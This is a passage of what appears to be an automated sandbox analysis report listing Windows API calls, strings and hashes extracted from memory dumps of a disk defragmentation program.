                                                                                                                                                                                                                                                                                                • API ID: Uninitialize$BlanketCreateInitializeInstanceProxy
                                                                                                                                                                                                                                                                                                • String ID: Caption$SELECT * from Win32_Volume$WQL
                                                                                                                                                                                                                                                                                                • API String ID: 3575674281-2330458756
                                                                                                                                                                                                                                                                                                • Opcode ID: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                                • Instruction ID: d51c13efc7a02c32f90284d818f56e509f551fc104d77d5da5b0aeb1152a1774
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10A189766083449FC300EF59C890A9BB7E9EF88354F10491EF44997360D779ED89CBA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(004216E9), ref: 00422459
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004224AE
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004224E0
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(004216E9,00000001,000003E8,00000000), ref: 0042250F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00422558
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008013,00000000), ref: 0042256D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008007,00000000), ref: 00422582
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,0000800C,00000000), ref: 00422597
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(004216E9,00000064,00000064,00000000), ref: 004225A3
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Timer$Window
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 389327760-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                                • Instruction ID: a9acc03ce2714c2a1218ac3b36ef8cf29172f02598394e016a1efff805efb144
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C516170390B00ABE624EB75CC82FD6B395AF44B04F40851DB359AB2D1CBF6B8418B48
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0042C6CB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0042D010: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042D041
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID: 3401007$3401034$3401035$8<$DiskDefrag$Frame_Color$Mid_Back_Color$Text_Color$Window$Window_Back_Gray_Color
                                                                                                                                                                                                                                                                                                • API String ID: 909852535-1675042175
                                                                                                                                                                                                                                                                                                • Opcode ID: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                                • Instruction ID: 43899c4dce7d941302b132538349e8bcafe351e88f225ab48a7149cde0acca41
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD316F707907017BD260BAB58C43FEA76A4AF84B04F20891BB65EB75C1CAF874419B9C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Optimize\OptimizeList,?,?,?,?,00427EC2,BB40E64E), ref: 0041D36A
                                                                                                                                                                                                                                                                                                • #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D397
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: *.avi,*.mpg,*.mpeg,*.mov,*.mkv,*.mp3,*.mp4,*.wmv$*.iso,*.bin$*.zip, *.rar$3403001$3403002$3403003$DiskDefrag\Setting Option\Optimize\OptimizeList$`=
                                                                                                                                                                                                                                                                                                • API String ID: 0-4238402903
                                                                                                                                                                                                                                                                                                • Opcode ID: be8af0238dc030f08aca80df25955cefc0936c7b45c5ded25a6e09dc14720ccf
                                                                                                                                                                                                                                                                                                • Instruction ID: 2b0b8f5636e7c6e0b71de8e83816cfbf5980d60911305a15352c27ff1d92b02b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be8af0238dc030f08aca80df25955cefc0936c7b45c5ded25a6e09dc14720ccf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD61B5B1504345AFC314EF50CC85FABB7B8FF84344F50492EF94A92160EB79A985CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0040F806
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001215,00000000,00000000), ref: 0040F82F
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0040F845
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040F876
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040F88B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F0C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F1E
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001209,00000000,00000000), ref: 0040F9EE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageRectSend$Copy$Client
                                                                                                                                                                                                                                                                                                • String ID: $6$8F
                                                                                                                                                                                                                                                                                                • API String ID: 201260696-978989186
                                                                                                                                                                                                                                                                                                • Opcode ID: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b216fbeb9dde18344444fa578b156f2309188772abd6b45e307a88af5c25f20
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4E141B15083429FD320DF25C580A9BFBE9FF88704F004A2EF49997381D778A949CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004187CD
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004187EF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0041899B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 004189AF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004189C5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,?), ref: 004189DB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                                • String ID: %.2f%%$%I64u$8F
                                                                                                                                                                                                                                                                                                • API String ID: 2245208738-1881348792
                                                                                                                                                                                                                                                                                                • Opcode ID: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                                • Instruction ID: e1e33ad56b98f5e84924c458d64c7c6c02eb77d82da0e984fc61a5a5d3d1ca0d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EA16E71304201AFD368EB24CD85FAFB7B9AF88704F40491EF64697291DBB4AC45CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 004027B1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 00402863
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402041$3402042$8F$DiskDefrag$Images$close$open
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2649565445
                                                                                                                                                                                                                                                                                                • Opcode ID: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                                • Instruction ID: 8150cbd10707325bb4a07bc8764e9056bc1ba0aa629cfab9f1adae748ae802a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8319EB579020027D61576254EA6FBE21661FC4B48F25C22FB30E7B3C2DEED9C41429E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                                • Instruction ID: be2023aef89e17b54fd3cfd96c880170c5f98da2cba37ae09b4ebda1ed5f38f7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79C1F4B56083448FC310DF69C884A5BFBE9BFC9714F148A5EE9888B361C775E905CB92
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 004181B6
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000006), ref: 00418204
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000003FD), ref: 0041827F
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000003FD), ref: 004182FA
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041833E
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00418350
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000003,0000FFFE), ref: 004183AA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectWindow$ClientMessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 1071774122-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d1e85c786be0547c74fbf31f73b40b43d39c9eef0f0cab4dee81a64cc519da0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9951B2713407026BD215EB60CD9AF6F73AAEBC4B04F04491CF6459B2D0EEB4E901879A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 00429964
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00424612
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00424C20: SendMessageW.USER32(?,000010A9,?,00000000), ref: 00424C61
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00424C20: SetForegroundWindow.USER32(?), ref: 00424C6D
                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000001,00000000), ref: 0042452F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekSendWait$DispatchForegroundPostTranslateWindow
                                                                                                                                                                                                                                                                                                • String ID: "RightMenuDisk"$"RightMenuFile"$-AutoDefragmention$-BootTimeDefrag$8F$ScheduleStart
                                                                                                                                                                                                                                                                                                • API String ID: 784092869-485786108
                                                                                                                                                                                                                                                                                                • Opcode ID: dc55257c4458ac874c86a61cc18cc1c17bee00782c775f5169f385f524cd433c
                                                                                                                                                                                                                                                                                                • Instruction ID: c97898347ab5420be132615685895ca4f66fbeb7c47801a8b84119e28bf46611
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc55257c4458ac874c86a61cc18cc1c17bee00782c775f5169f385f524cd433c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251C431304310AFC300EF15EDC5A6BB7E4EBD8755F84092EF54A92291DBB89988CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102F,?,00000000), ref: 0042D3DB
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D3F8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D411
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D433
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D46C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$Selected$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3927076241
                                                                                                                                                                                                                                                                                                • Opcode ID: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                                • Instruction ID: 47af735872212f4aff9019aaa9f39296bd56d2d945b6e3696df55891068cb05b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4521D8757407117BE230EB79ED82F9BA3A4AB48B55F504A1AF705A72C1CAB4F801879C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                                • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                                • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                                • Opcode ID: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                                • Instruction ID: 7aa1b3021184ad304fb6d47c852e9f0d985907e1382866191d812cb31a89d144
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 872179F0A50301BBD7106BB49C4AB9A31A8AF54701F50C82BB50EE1550D7BCA8449B6D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 005FE960
                                                                                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 005FEA6E
                                                                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 005FEBC0
                                                                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 005FEBDB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                                                • Opcode ID: 08a24b7a806b8d6ec1416d2dfd391db455ed87810685ef5def1f7c42871ac48a
                                                                                                                                                                                                                                                                                                • Instruction ID: e73f2a20be353d8c2df27e872894231c1fc0a654930275ec37afaed710c64779
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08a24b7a806b8d6ec1416d2dfd391db455ed87810685ef5def1f7c42871ac48a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57B14C3180020EDFCF15EFA4C9469BEBFB6FF54310B14456AEA016B222D779DA51CBA1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004012D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004768A9,000000FF), ref: 00401305
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004012D0: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,?,004768A9,000000FF), ref: 00401316
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00465580
                                                                                                                                                                                                                                                                                                • SetRect.USER32 ref: 004655DE
                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000005,00000000,00000005,00000000), ref: 004655ED
                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(0000000E,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,Arial), ref: 00465611
                                                                                                                                                                                                                                                                                                • GdiplusStartup.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,00000005,00000000,00000005,00000000,?,00000000), ref: 00465655
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$CriticalRectSection$ColorCreateEnterFontGdiplusLeaveReleaseStartup
                                                                                                                                                                                                                                                                                                • String ID: 8<$Arial
                                                                                                                                                                                                                                                                                                • API String ID: 3457378621-1936108657
                                                                                                                                                                                                                                                                                                • Opcode ID: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                                • Instruction ID: b865aa364f9357de02ae4fe0840df8cdec7f8c78b7ca9b09445c5b8d1f81986b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED8121B09057889EDB70DF2ACC44BCABBE8BF94714F00011FF8489A2A1DBB55604CF99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000010,00000002), ref: 0042352E
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(BB40E64E), ref: 00423545
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0042354F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CursorForegroundMenuWindow
                                                                                                                                                                                                                                                                                                • String ID: 3401016$^H
                                                                                                                                                                                                                                                                                                • API String ID: 390680170-2641057668
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 004557C8
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32 ref: 00455855
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DiskFreeInformationSpaceVolume
                                                                                                                                                                                                                                                                                                • String ID: C:\$FAT$FAT16$FAT32$NTFS
                                                                                                                                                                                                                                                                                                • API String ID: 3270478670-3579686192
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,00000000,?,?,004543B4,?,00000000,00000000), ref: 004541C4
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00454215
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045421F
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045422C
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,BB40E64E,?,00000000,?,?,004543B4,?,00000000,00000000,?,?,?,?,?), ref: 00454273
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
